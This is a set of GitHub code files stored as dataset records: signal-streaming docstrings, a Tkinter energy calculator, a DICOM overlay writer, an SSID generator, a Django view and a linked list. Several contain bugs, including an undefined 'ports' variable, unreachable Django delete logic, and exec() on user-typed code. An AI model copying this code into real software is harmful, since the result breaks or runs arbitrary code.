Either set this value to more\n heaps than will ever be sent (which will use unbounded memory) or be\n sure to block on the futures returned before exceeding the capacity.\n\n Parameters\n ----------\n thread_pool : :py:class:`spead2.ThreadPool`\n Thread pool handling the I/O\n queues : List[:py:class:`spead2.InprocQueue`]\n Queue holding the data in flight\n config : :py:class:`spead2.send.StreamConfig`\n Stream configuration\n \"\"\"\n\ntry:\n from spead2._spead2.send import UdpIbvStreamAsyncio as _UdpIbvStreamAsyncio\n\n UdpIbvStream = _wrap_class('UdpIbvStream', _UdpIbvStreamAsyncio)\n UdpIbvStream.__doc__ = \\\n \"\"\"Like :class:`UdpStream`, but using the Infiniband Verbs API.\n\n Parameters\n ----------\n thread_pool : :py:class:`spead2.ThreadPool`\n Thread pool handling the I/O\n endpoints : List[Tuple[str, int]]\n Destinations to transmit to. For backwards compatibility, one can\n also provide a single address and port as two separate\n parameters.\n config : :py:class:`spead2.send.StreamConfig`\n Stream configuration\n interface_address : str\n IP address of network interface from which to send\n buffer_size : int, optional\n Buffer size\n ttl : int, optional\n Time-To-Live of packets\n comp_vector : int, optional\n Completion channel vector (interrupt)\n for asynchronous operation, or\n a negative value to poll continuously. Polling\n should not be used if there are other users of the\n thread pool. If a non-negative value is provided, it\n is taken modulo the number of available completion\n vectors. This allows a number of readers to be\n assigned sequential completion vectors and have them\n load-balanced, without concern for the number\n available.\n max_poll : int\n Maximum number of times to poll in a row, without\n waiting for an interrupt (if `comp_vector` is\n non-negative) or letting other code run on the\n thread (if `comp_vector` is negative).\n \"\"\"\n\nexcept ImportError:\n pass\n","repo_name":"kernsuite-debian/spead2","sub_path":"src/spead2/send/asyncio.py","file_name":"asyncio.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38830387290","text":"from __future__ import print_function\nimport __future__\ntry:\n from Tkinter import Button, Tk, Toplevel, Label, Listbox, Scrollbar,\\\n LabelFrame, Entry, Frame, Radiobutton, Text, Checkbutton\n import Tkinter\n import tkMessageBox\n from tkFileDialog import *\nexcept ImportError:\n from tkinter import Button, Tk, Toplevel, Label, Listbox, Scrollbar,\\\n LabelFrame, Entry, Frame, Radiobutton, Text, Checkbutton\n import tkinter as Tkinter\n import tkinter.messagebox as tkMessageBox\n from tkinter.filedialog import *\nimport threading\nimport math\nimport os\n\nDEFAULT_CODE = \"\"\"# Use Python syntax to define the function f that takes\n# one argument (the scalar product) and returns the associated energy.\n# Example - Riesz energy\ndef f(x):\n return pow((2*(1-x)),-2)\n\n\"\"\"\n\nclass MainWindow:\n def __init__(self):\n self.root = Tk()\n self.input_type = Tkinter.IntVar()\n self.input_type.set(1)\n self.normalize_data = Tkinter.IntVar()\n self.normalize_data.set(1)\n self.root.title(\"Code energy calculator\")\n self.left_frame = LabelFrame(self.root,\n text=\"Input and output\")\n self.left_frame.pack(side=Tkinter.LEFT, fill=Tkinter.BOTH,\n expand=True, padx=(10, 5), pady=10)\n self.right_frame = LabelFrame(self.root, text=\"Code\")\n self.right_frame.pack(side=Tkinter.RIGHT, fill=Tkinter.BOTH,\n expand=True, 
padx=(5, 10), pady=10)\n code_hscroll = Scrollbar(self.right_frame, orient=Tkinter.HORIZONTAL)\n code_hscroll.pack(side=Tkinter.BOTTOM, fill=Tkinter.X)\n code_vscroll = Scrollbar(self.right_frame)\n code_vscroll.pack(side=Tkinter.RIGHT, fill=Tkinter.Y)\n self.code_text = Text(self.right_frame, wrap=Tkinter.NONE,\n xscrollcommand=code_hscroll.set,\n yscrollcommand=code_vscroll.set)\n self.code_text.pack()\n self.code_text.insert(Tkinter.INSERT, DEFAULT_CODE)\n code_hscroll.config(command=self.code_text.xview)\n code_vscroll.config(command=self.code_text.yview)\n self.input_file_entry =\\\n self.create_and_add_file_field(self.left_frame, \"Input file\", 5, False)\n self.spherical_coord_option =\\\n Radiobutton(self.left_frame, text=\"Spherical coordinates\",\n variable=self.input_type, value=1)\n self.spherical_coord_option.pack(anchor=Tkinter.W)\n self.cartesian_coord_option =\\\n Radiobutton(self.left_frame, text=\"Cartesian coordinates\",\n variable=self.input_type, value=2)\n self.cartesian_coord_option.pack(anchor=Tkinter.W)\n self.spherical_coord_option.select()\n self.output_file_entry =\\\n self.create_and_add_file_field(self.left_frame, \"Output file\", 5, True)\n self.normalize_check = Checkbutton(self.left_frame, text=\"Normalize data\",\n variable=self.normalize_data,\n offvalue=0, onvalue=1)\n self.normalize_check.pack()\n self.normalize_check.deselect()\n self.do_button = Button(self.left_frame, text=\"Run\", command=self.run)\n self.do_button.pack(side=Tkinter.BOTTOM, pady=(0, 10))\n\n def create_and_add_file_field(self, parent, title, pad, is_save):\n title_label = Label(parent, text=title)\n title_label.pack(side=Tkinter.TOP, padx=pad)\n container_frame = Frame(parent)\n container_frame.pack(side=Tkinter.TOP, padx=pad, pady=(0, pad))\n filename_entry = Entry(container_frame)\n filename_entry.pack(side=Tkinter.LEFT)\n browse_button = \\\n Button(container_frame, text=\"Browse...\",\n command=lambda: self.select_file(filename_entry, is_save))\n browse_button.pack(side=Tkinter.RIGHT)\n return filename_entry\n\n @staticmethod\n def select_file(text_field, is_save):\n text_field.delete(0, Tkinter.END)\n if is_save:\n filename = asksaveasfilename()\n else:\n filename = askopenfilename()\n text_field.insert(0, filename)\n\n def run(self):\n input_fname = self.input_file_entry.get()\n output_fname = self.output_file_entry.get()\n code = self.code_text.get(1.0, Tkinter.END)\n do_work(input_fname, output_fname, code,\n self.input_type.get(), self.normalize_data.get())\n\n def show(self):\n self.root.mainloop()\n\n\ndef spherical_to_cartesian(ro, azim, incl):\n x = ro * math.sin(incl) * math.cos(azim)\n y = ro * math.sin(incl) * math.sin(azim)\n z = ro * math.cos(incl)\n return (x,y,z)\n\ndef scalar_product(vec1, vec2):\n return vec1[0] * vec2[0] + vec1[1] * vec2[1] + vec1[2] * vec2[2]\n\ndef sqr(x):\n return x*x\n\ndef normalized(pt):\n length = math.sqrt(sqr(pt[0]) + sqr(pt[1]) + sqr(pt[2]))\n if length==0:\n return pt\n return (pt[0] / length, pt[1] / length, pt[2] / length)\n\ndef do_work(input_fname, output_fname, code, input_type, should_normalize):\n\n # Parse input\n fin = open(input_fname, 'r')\n if not fin:\n tkMessageBox.showerror(\"Error\", \"Cannot open input file\")\n fout = open(output_fname, 'w')\n if not fout:\n tkMessageBox.showerror(\"Error\", \"Cannot open output file\")\n points = []\n for line in fin:\n parts = line.split()\n if(len(parts) < 3):\n break\n point = None\n if input_type == 2:\n point = (float(parts[0]), float(ports[1]), float(ports[2]))\n elif 
input_type == 1:\n point =\\\n spherical_to_cartesian(float(parts[0]), float(parts[1]),\n float(parts[2]))\n else:\n print(input_type)\n raise RuntimeError(\"Don't know how to handle this input type\")\n points.append(point)\n\n # Run the code the user wrote\n user_namespace = {}\n exec(code, user_namespace)\n f = user_namespace[\"f\"]\n print(f)\n\n # Normalize points if necessary\n if should_normalize:\n for i in range(len(points)):\n points[i] = normalized(points[i])\n\n # Calculate code energy\n energy_sum = 0\n for i in range(len(points)):\n print(points[i])\n for j in range(i+1, len(points)):\n pt1 = points[i]\n pt2 = points[j]\n sp = scalar_product(pt1, pt2)\n energy_sum += f(sp)\n\n # Output\n print(energy_sum, file=fout)\n\n # Notify user\n tkMessageBox.showinfo(\"Done!\", \"Calculation complete. The answer is: \" + str(energy_sum))\n\ndef main():\n main_window = MainWindow()\n main_window.show()\n\nif __name__==\"__main__\":\n main()\n","repo_name":"EnSec4Git/code-energy-calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31713102062","text":"#ex1133 Resto da divisão\nx = int(input())\ny = int(input())\n\nlista = []\nlista.append(x)\nlista.append(y)\nlista.sort()\nx = lista[0] # x vai ser o menor numero\ny = lista[1] # y vai ser o maior numero\ninicio = x\nfim = y\n\nfor c in range(inicio + 1, fim):\n if c % 5 == 2 or c % 5 == 3:\n print(c)\n","repo_name":"wagnersistemalima/Exercicios-Python-URI-Online-Judge-Problems---Contests","sub_path":"Pacote Dawload/Projeto progamas Python/ex1133 Resto da divisão For.py","file_name":"ex1133 Resto da divisão For.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"23182722011","text":"import string\nimport random\nimport os.path\nfrom random import randint\n\nclass gen_ssid(object):\n\tdef __init__(self,mask='NO_MASK_SET_YET'):\n\t\tself.mask = mask\n\t\tself.buffer = \"\"\n\t\tself.masks = []\n\t\tself.mask_file = \"\"\n\t\t\n\tdef do_mask(self):\n\t\ti = 0\n\t\twhile i < len(self.mask):\n\t\t\tif self.mask[i] == \"?\":\n\t\t\t\tself.buffer = self.buffer + {'d' : str(randint(0,9)),\n\t\t\t\t\t\t\t'l' : random.choice(string.ascii_lowercase),\n\t\t\t\t\t\t\t'u' : random.choice(string.ascii_uppercase),\n\t\t\t\t\t\t\t'a' : random.choice(string.ascii_lowercase + string.digits),\n\t\t\t\t\t\t\t'A' : random.choice(string.ascii_uppercase + string.digits),\n\t\t\t\t\t\t\t'x' : random.choice(string.hexdigits).lower(),\n\t\t\t\t\t\t\t'X' : random.choice(string.hexdigits).upper(),\n\t\t\t\t}[self.mask[i+1]]\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tself.buffer = self.buffer + self.mask[i]\n\t\t\ti += 1\n\t\tresult = self.buffer\n\t\tself.buffer = \"\"\n\t\treturn result\n\n\tdef set_random_mask(self):\n\t\tself.mask = random.choice(self.masks)\n\n\tdef return_mask_count(self):\n\t\treturn str(self.mask_count)\n\n\tdef load_mask_file(self):\n\t\tif self.mask_file:\n\t\t\tif os.path.isfile(self.mask_file):\n\t\t\t\twith open(self.mask_file) as f:\n\t\t\t\t\tfor line in f.readlines():\n\t\t\t\t\t\tself.masks.append(line.rstrip('\\n'))\n\n","repo_name":"great9/probe_toolkit","sub_path":"probe_toolkit/gen_ssid.py","file_name":"gen_ssid.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18920320013","text":" 
#!/usr/bin/env python\n\nimport SimpleITK as sitk\nimport sys, os, glob, json, time, csv\nfrom datetime import datetime\nimport numpy as np\n\n# For local testng\n# os.environ[\"WORKFLOW_DIR\"] = \"/sharedFolder/F1\" #\"\"\n# os.environ[\"BATCH_NAME\"] = \"batch\"\n# os.environ[\"OPERATOR_IN_DIR\"] = \"None\"\n# os.environ[\"OPERATOR_OUT_DIR\"] = \"output\"\n# os.environ[\"OPERATOR_IN_MASK_DIR\"] = \"wmls\"\n# os.environ[\"OPERATOR_IN_DCM_JSON_DIR\"] = \"GetFlairMetadata\"\n# os.environ[\"OPERATOR_IN_REFERENCE_IMAGE_DIR\"] = \"Flair_to_nii\"\n# os.environ[\"SERIES_DESC\"] = \"overlay\"\n# os.environ[\"MODALITY\"] = \"MR\"\n# os.environ[\"SERIES_NUM\"] = \"901\"\n# os.environ[\"OPACITY\"] = \"0.5\"\n# os.environ[\"COLOR_SCHEME\"] = \"/sharedFolder/colors/wmls_color_scheme.csv\"\n\nuser_specified_modality = os.environ[\"MODALITY\"]\nuser_specified_series_number = os.environ[\"SERIES_NUM\"] #Default Series Number: 901\nuser_specified_series_description = os.environ[\"SERIES_DESC\"] #Default Series Description: \"Segmentation Overlay\"\nuser_specified_opacity = float(os.environ[\"OPACITY\"]) #Default opacity: 0.5\nuser_specified_color_scheme = os.environ[\"COLOR_SCHEME\"] #Path to color scheme file\n\ndef writeimage(image, output_file_path):\n writer = sitk.ImageFileWriter()\n writer.SetFileName ( output_file_path )\n writer.Execute ( image )\n\ndef readimage(input_file_path):\n reader = sitk.ImageFileReader()\n reader.SetFileName ( input_file_path )\n image = reader.Execute()\n return image\n\ndef hex_to_rgb(hex: str):\n hex = hex[1:]\n assert len(hex) == 6\n return [int(hex[i:i + 2], 16) for i in (0, 2, 4)]\n\ndef read_color_scheme(csv_path):\n with open(csv_path) as cmap:\n reader = csv.reader(cmap, delimiter=',')\n\n # Read mapping csv to dictionary\n cdict = {}\n for row in reader:\n #second item is roi number, 4th item is color in hexadecimal\n color = row[3]\n #dict of roi label to color\n key = int(row[1])\n print('key: ', key, ' color: ', color)\n cdict[key] = color\n return cdict\n\ndef do_overlay(image, segmentation, color_dict,opacity=0.5):\n nda_mask = sitk.GetArrayFromImage(segmentation)\n nda_img = sitk.GetArrayFromImage(image)\n new_img = np.copy(nda_img)\n new_img2 = np.zeros([new_img.shape[0],new_img.shape[1],new_img.shape[2],3])\n new_img2[:,:,:,0] = new_img\n new_img2[:,:,:,1] = new_img\n new_img2[:,:,:,2] = new_img\n\n for k in color_dict:\n new_img2[nda_mask == k] += opacity * np.array(hex_to_rgb(color_dict[k]))\n\n rgb_img = sitk.GetImageFromArray(new_img2)\n rgb_img.CopyInformation(segmentation)\n\n rgb_img_rescaled = sitk.RescaleIntensity(rgb_img)\n result_img = sitk.Cast(rgb_img_rescaled,sitk.sitkVectorUInt8)\n return result_img\n\ndef get_dicom_tags_from_json(dcm_json_file):\n with open(dcm_json_file, 'r') as json_file:\n data = json.load(json_file)\n\n print(\"reading dicom metadata from json\")\n tags_to_copy = []\n\n # identify relevant tags from the original meta-data dictionary of input image\n ####patient specific tags########\n patient_id = next((value for key, value in data.items() if 'PatientID' in key),None)\n print(\"patient id: \", patient_id)\n if(patient_id != None):\n tags_to_copy.append((\"0010|0020\", patient_id))# Patient ID\n\n patient_name = next((value for key, value in data.items() if 'PatientName' in key),None)\n print(\"patient name: \", patient_name)\n if(patient_name != None):\n tags_to_copy.append((\"0010|0010\", patient_name))# Patient Name\n\n patient_sex = next((value for key, value in data.items() if 'PatientSex' in key),None)\n 
print(\"patient sex: \", patient_sex)\n if(patient_sex != None):\n tags_to_copy.append((\"0010|0040\", patient_sex))# Patient Sex\n\n patient_age = [value for key, value in data.items() if 'PatientAge' in key][0]\n print(\"patient age: \", patient_age)\n if(patient_age != None):\n tags_to_copy.append((\"0010|1010\", patient_age))# Patient age\n\n patient_size = next((value for key, value in data.items() if 'PatientSize' in key),None)\n print(\"patient size: \", patient_size)\n if(patient_size != None):\n tags_to_copy.append((\"0010|1020\", patient_size))# Patient size\n\n patient_wt = next((value for key, value in data.items() if 'PatientWeight' in key),None)\n print(\"patient wt: \", patient_wt)\n if(patient_wt != None):\n tags_to_copy.append((\"0010|1030\", patient_wt))# Patient wt\n\n #####study specific tags#####\n study_uid = next((value for key, value in data.items() if 'StudyInstanceUID' in key),None)\n print(\"study uid \", study_uid)\n if(study_uid != None):\n tags_to_copy.append((\"0020|000D\", study_uid))# Study Instance UID, for machine consumption\n\n study_id = next((value for key, value in data.items() if 'StudyID' in key),None)\n print(\"study id \", study_id)\n if(study_id != None):\n tags_to_copy.append((\"0020|0010\", study_id))# Study ID, for human consumption\n\n study_date = next((value for key, value in data.items() if 'StudyDate' in key),None)\n print(\"study date \", study_date)\n if(study_date != None):\n tags_to_copy.append((\"0008|0020\", study_date))# Study Date\n\n study_time = next((value for key, value in data.items() if 'StudyTime' in key),None)\n print(\"study time \", study_time)\n if(study_time != None):\n tags_to_copy.append((\"0008|0030\", study_time))# Study Time\n\n #####other tags####\n #use modality specified by user(think multi-modality pipeline) otherwise use the one from reference image\n if(user_specified_modality == \"None\"):\n modality = next((value for key, value in data.items() if 'Modality' in key),None)\n else:\n modality = user_specified_modality\n print(\"modality \", modality)\n if(study_time != None):\n tags_to_copy.append((\"0008|0060\", modality)) # Modality\n\n #accession number\n possible_accession_number_values = [value for key, value in data.items() if 'AccessionNumber' in key]\n if len(possible_accession_number_values) == 0:\n attribute_sequence = [value for key, value in data.items() if 'RequestAttributesSequence_object_object' in key][0]\n possible_accession_number_values = [value for key, value in attribute_sequence.items() if 'AccessionNumber' in key]\n if len(possible_accession_number_values) == 0:\n print(\"accession number not found\")\n accession_number_found = False\n else:\n accession_number_found = True\n accession_number = possible_accession_number_values[0]\n else:\n accession_number_found = True\n accession_number = possible_accession_number_values[0]\n\n # print('accession_number: ', accession_number)\n\n if(accession_number_found):\n tags_to_copy.append((\"0008|0050\", accession_number)) #AccessionNumber\n\n return tags_to_copy\n\ndef write_dicom_slices(outdir, tags_to_write, new_img, i):\n image_slice = new_img[:,:,i]\n\n # Tags shared by the series.\n list(map(lambda tag_value: image_slice.SetMetaData(tag_value[0], str(tag_value[1])), tags_to_write))\n\n # Slice specific tags.\n image_slice.SetMetaData(\"0008|0012\", time.strftime(\"%Y%m%d\")) # Instance Creation Date\n image_slice.SetMetaData(\"0008|0013\", time.strftime(\"%H%M%S\")) # Instance Creation Time\n\n #Setting the type to CT preserves the slice 
location.\n #image_slice.SetMetaData(\"0008|0060\", \"MR\") # set the type to CT so the thickness is carried over\n\n # (0020, 0032) image position patient determines the 3D spacing between slices.\n image_slice.SetMetaData(\"0020|0032\", '\\\\'.join(map(str,new_img.TransformIndexToPhysicalPoint((0,0,i))))) # Image Position (Patient)\n image_slice.SetMetaData(\"0020|0013\", str(i)) # Instance Number\n image_slice.SetMetaData(\"0020|0011\", str(user_specified_series_number)) # Series Number - default 901\n\n # Write to the output directory and add the extension dcm, to force writing in DICOM format.\n writer.SetFileName(os.path.join(outdir,str(i)+'.dcm'))\n writer.Execute(image_slice)\n\nbatch_folders = [f for f in glob.glob(os.path.join('/', os.environ['WORKFLOW_DIR'], os.environ['BATCH_NAME'], '*'))]\nprint('batch_folders: ',batch_folders)\n\nfor batch_element_dir in batch_folders:\n\n if \"None\" not in os.environ[\"OPERATOR_IN_REFERENCE_IMAGE_DIR\"]:\n print(\"Reference image folder provided\")\n ref_image_input_dir = os.path.join(batch_element_dir, os.environ['OPERATOR_IN_REFERENCE_IMAGE_DIR'])\n ref_image_file = sorted(glob.glob(os.path.join(ref_image_input_dir, \"*.nii.gz\"), recursive=True)) or sorted(glob.glob(os.path.join(ref_image_input_dir, \"*.nrrd\"), recursive=True))\n print(ref_image_file)\n\n if \"None\" not in os.environ[\"OPERATOR_IN_MASK_DIR\"]:\n print(\"mask image folder provided\")\n mask_image_input_dir = os.path.join(batch_element_dir, os.environ['OPERATOR_IN_MASK_DIR'])\n mask_image_file = sorted(glob.glob(os.path.join(mask_image_input_dir, \"*.nrrd\"), recursive=True)) or sorted(glob.glob(os.path.join(mask_image_input_dir, \"*.nii.gz\"), recursive=True))\n print(mask_image_file)\n\n if \"None\" not in os.environ[\"OPERATOR_IN_DCM_JSON_DIR\"]:\n print(\"Dicom json(metadata) folder provided\")\n dcm_json_input_dir = os.path.join(batch_element_dir, os.environ['OPERATOR_IN_DCM_JSON_DIR'])\n dcm_json_file = sorted(glob.glob(os.path.join(dcm_json_input_dir, \"*.json*\"), recursive=True))\n print(dcm_json_file)\n\n if len(ref_image_file) == 0 and len(mask_image_file) == 0 and len(dcm_json_file) == 0 and len(user_specified_color_scheme) == 0:\n print(\"reference image, mask image, dicom json file or color scheme csv file not found!\")\n exit(1)\n else:\n print(f\"Starting creation of dicom seg overlay for reference image {ref_image_file} with mask {mask_image_file} and json {dcm_json_file}\")\n\n image = readimage(ref_image_file[0])\n print(\"input reference image read\")\n\n cDict = read_color_scheme(user_specified_color_scheme)\n print('# items with color mapping: ', len(cDict))\n\n # To visualize the labels image in RGB we need to reduce the intensity range ( 0-255 )\n img_255 = sitk.Cast(sitk.RescaleIntensity(image), sitk.sitkUInt8)\n\n mask = readimage(mask_image_file[0])\n print(\"label map read\")\n\n #do the overlay\n #overlaid_img = sitk.LabelOverlay(image=img_255, labelImage=mask, opacity=0.5)\n overlaid_img = do_overlay(img_255,mask,cDict,user_specified_opacity)\n print(\"Label Overlay Done\")\n\n #dicom creation\n writer = sitk.ImageFileWriter()\n writer.KeepOriginalImageUIDOn()\n\n #create new dicom tags for our dicom file\n modification_time = time.strftime(\"%H%M%S\")\n modification_date = time.strftime(\"%Y%m%d\")\n\n direction = overlaid_img.GetDirection()\n series_tag_values = [(\"0008|0031\",modification_time), # Series Time\n (\"0008|0021\",modification_date), # Series Date\n (\"0008|0008\",\"DERIVED\\\\SECONDARY\"), # Image Type\n (\"0020|000e\", 
\"1.2.826.0.1.3680043.2.1125.\"+modification_date+\".1\"+modification_time), # Series Instance UID\n (\"0020|0037\", '\\\\'.join(map(str, (direction[0], direction[3], direction[6],# Image Orientation (Patient)\n direction[1],direction[4],direction[7])))),\n (\"0008|103e\", user_specified_series_description)] # Series Description - default \"segmentation overlay\"\n\n #dicom tags to write\n tags_to_write = series_tag_values + get_dicom_tags_from_json(dcm_json_file[0])\n\n element_output_dir = os.path.join(batch_element_dir, os.environ['OPERATOR_OUT_DIR'])\n if not os.path.exists(element_output_dir):\n os.makedirs(element_output_dir)\n\n #write dicom images\n list(map(lambda i: write_dicom_slices(element_output_dir,tags_to_write, overlaid_img, i), range(overlaid_img.GetDepth())))\n print(\"dicom rgb overlay written\")\n","repo_name":"CBICA/TIP","sub_path":"neurodegeneration/processing-containers/seg2RGBDicom/files/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":12383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39984658384","text":"class LLele(object):\n def __init__(self, x):\n self.data = x\n self.next = None\n \n def __repr__(self):\n return str(self.data)\n\n\nclass LL(object):\n def __init__(self, head: LLele):\n self.head = head\n self.len = len(self)\n\n def insert(self, Node: LLele, index: int):\n pass\n\n def delete(self, item: LLele):\n tmp = self.head\n post = tmp.next\n\n if len(self) == 1:\n self.head = None\n return 1\n\n while post != None:\n if post.data == item:\n tmp.next = post.next\n return 1\n tmp = post\n post = tmp.next\n else:\n return 0\n\n return 0\n\n\n def reverse(self):\n prev = None\n head = self.head\n post = None\n\n while head != None:\n post = head.next\n if post == None:\n self.head = head\n \n head.next = prev\n prev = head\n head = post\n\n def __contains__(self, item):\n tmpP = self.head\n\n while tmpP != None:\n if tmpP.data == item:\n return True\n tmpP = tmpP.next\n\n return False\n\n def __repr__(self):\n if self.head == None:\n return \"None\"\n charList = []\n tmpHead = self.head\n while self.head.next != None:\n charList.append(str(self.head.data))\n self.head = self.head.next\n else:\n charList.append(str(self.head.data))\n self.head = tmpHead\n return '->'.join(charList)\n\n def __len__(self):\n length = 0\n tmpP = self.head\n\n while tmpP != None:\n length += 1\n tmpP = tmpP.next\n\n return length\n\n\nif __name__ == \"__main__\":\n from itertools import repeat\n a = [LLele(i) for i in repeat(1, times = 5)]\n\n for l1, l2 in zip(a, a[1:]):\n l1.next = l2\n l = LL(a[0])\n\n l.delete(1)\n print(l)\n # l.reverse()\n # print(l)\n","repo_name":"Alwaysproblem/simplecode","sub_path":"python_Interview/LNode.py","file_name":"LNode.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30397589839","text":"# Week 2 - 5) Write the pseudocode corresponding to functions for addition,\n# subtraction and multiplication of two matrices, and then compute\n# A = B*C-2*(B+C) where B and C are two quadratic matrices of order\n# n. 
What is the run-time?\n\n'''\nPSEUDOCODE\n----------\nADD_MATRIX(B, C)\n resultMatrix <- []\n FOR i IN range(length of B)\n APPEND [] TO resultMatrix\n FOR j IN range(length of C[0])\n APPEND B[i][j] + C[i][j] TO resultMatrix[i]\n\nSUB_MATRIX(B, C)\n resultMatrix <- []\n FOR i IN range(length of B)\n APPEND [] TO resultMatrix\n FOR j IN range(length of C[0])\n APPEND B[i][j] - C[i][j] TO resultMatrix[i]\n\nMULTI_MATRIX(B, C)\n resultMatrix <- []\n FOR i IN range(length of B)\n APPEND [] TO resultMatrix\n FOR j IN range(length of C[0])\n APPEND 0 TO resultMatrix[i]\n FOR k IN range(length of C)\n resultMatrix <- resultMatrix + (B[i][k] * C[k][j])\n'''\n\ndef addMatrix(matrixOne, matrixTwo):\n '''Takes two Matrix and adds them together to get a result.''' # Example: n=3\n resultMatrix = [] # O(1) --> O(1)\n # Check length of the first Matrix\n for x in range(len(matrixOne)): # O(n) --> O(3)\n resultMatrix.append([]) # O(n) --> O(3)\n # Check height of the second Matrix\n for y in range(len(matrixTwo[0])): # O(n^2) --> O(9)\n # Add the values at the same positions together to get result.\n resultMatrix[x].append(int(matrixOne[x][y]) + int(matrixTwo[x][y])) # O(n^2) --> O(9)\n \n # Return Added Matrix Result\n return resultMatrix # O(1) --> O(1)\n\ndef subMatrix(matrixOne, matrixTwo):\n '''Takes two Matrix and subtracts them from each other.''' # Example: n=2\n resultMatrix = [] # O(1) --> O(1)\n # Check length of the first Matrix\n for x in range(len(matrixOne)): # O(n) --> O(2)\n resultMatrix.append([]) # O(n) --> O(2)\n # Check height of the second Matrix\n for y in range(len(matrixOne[0])): # O(n^2) --> O(4)\n # Subtract the values at the same positions from each other to get result.\n resultMatrix[x].append(int(matrixOne[x][y]) - int(matrixTwo[x][y])) # O(n^2) --> O(4)\n\n # Return Subtracted Matrix.\n return resultMatrix # O(1) --> O(1)\n\ndef multiMatrix(matrixOne, matrixTwo):\n '''Takes two Matrix values and multiplys them together.''' # Example: n=2\n resultMatrix = [] # O(1) --> O(1)\n # Check length of the first Matrix\n for x in range(len(matrixOne)): # O(n) --> O(2)\n resultMatrix.append([]) # O(n) --> O(2)\n # Check height of the second Matrix\n for y in range(len(matrixTwo[0])): # O(n^2) --> O(4)\n resultMatrix[x].append(0) # O(n^2) --> O(4)\n # Check the length of MatrixTwo.\n for k in range(len(matrixTwo)): # O(n^3) --> O(8)\n # Multiply all the values in row of matrixOne and column of matrixTwo\n # together.\n resultMatrix[x][y] += int(matrixOne[x][k])*int(matrixTwo[k][y]) # O(n^3) --> O(8)\n\n # Returns Multiplyed Matrix.\n return resultMatrix # O(1) --> O(1)\n\ndef equationMatrix(B, C):\n '''Calculates the equation A=B*C-2*(B+C)'''\n # Part 1 = B+C\n result1 = addMatrix(B, C)\n \n # Part 2 = B*C\n result2 = multiMatrix(B, C)\n \n # Part 3 = 2*Part 1\n result3 = addMatrix(result1, result1)\n \n # Answer = Part 2 - Part 3\n answer = subMatrix(result2, result3)\n\n return answer\n\nif __name__ == \"__main__\":\n while True:\n try:\n # Determine the number of rows.\n print(\"---MATRIX ROWS---\")\n rows = 0\n while rows <= 0:\n rows = int(input(\"Number of rows: \"))\n if rows == 0:\n print(\"NEED 1 OR MORE ROWS.\")\n\n # Determine the values within the first Matrix\n print(\"\\n---MATRIX 1---\")\n matrixOne = []\n for row in range(rows):\n data = input(\"Enter numerical values (split by ','): \").split(',')\n matrixOne.append(data)\n\n # Determine the values within the second Matrix\n print(\"\\n---MATRIX 2---\")\n matrixTwo = []\n for row in range(rows):\n data = input(\"Enter 
\nif __name__ == \"__main__\":\n    while True:\n        try:\n            # Determine the number of rows.\n            print(\"---MATRIX ROWS---\")\n            rows = 0\n            while rows <= 0:\n                rows = int(input(\"Number of rows: \"))\n                if rows <= 0:\n                    print(\"NEED 1 OR MORE ROWS.\")\n\n            # Determine the values within the first Matrix\n            print(\"\\n---MATRIX 1---\")\n            matrixOne = []\n            for row in range(rows):\n                data = input(\"Enter numerical values (split by ','): \").split(',')\n                matrixOne.append(data)\n\n            # Determine the values within the second Matrix\n            print(\"\\n---MATRIX 2---\")\n            matrixTwo = []\n            for row in range(rows):\n                data = input(\"Enter numerical values (split by ','): \").split(',')\n                matrixTwo.append(data)\n\n            # Perform the following calculation.\n            print(\"B*C-2*(B+C)=\"+str(equationMatrix(matrixOne, matrixTwo)))\n        except Exception:\n            break\n","repo_name":"timothydillan/210CT-Coursework","sub_path":"Basic-Py/5-Matrixes.py","file_name":"5-Matrixes.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"40461232231","text":"import sqlite3\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .details import get_project_tool\nfrom ..connection import Connection\n\n@login_required\ndef project_tool_list(request):\n    if request.method == 'POST':\n        form_data = request.POST\n        tool_id = request.POST.getlist('multicheckbox[]')\n\n\n        with sqlite3.connect(Connection.db_path) as conn:\n            db_cursor = conn.cursor()\n\n            for id in tool_id:\n                db_cursor.execute(\"\"\"\n                INSERT INTO projectpartnerapp_projecttool\n                (\n                    project_id, tool_id\n                )\n                VALUES (?, ?)\n                \"\"\",\n                (form_data['project_id'], id,)\n                )\n\n        return redirect(reverse('projectpartnerapp:material_form'))\n\n    if (\n        \"actual_method\" in form_data\n        and form_data[\"actual_method\"] == \"DELETE\"\n    ):\n        with sqlite3.connect(Connection.db_path) as conn:\n            db_cursor = conn.cursor()\n            if(project_tool.tool_id == project_tool.tool.id):\n                db_cursor.execute(\"\"\"\n                DELETE FROM projectpartnerapp_projecttool\n                WHERE id = ?\n                \"\"\", (project_tool.id,))\n\n    return redirect(reverse('projectpartnerapp:projects'))","repo_name":"Jeff-Hill/Project-Partner","sub_path":"projectpartnerproject/projectpartnerapp/views/project_tools/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
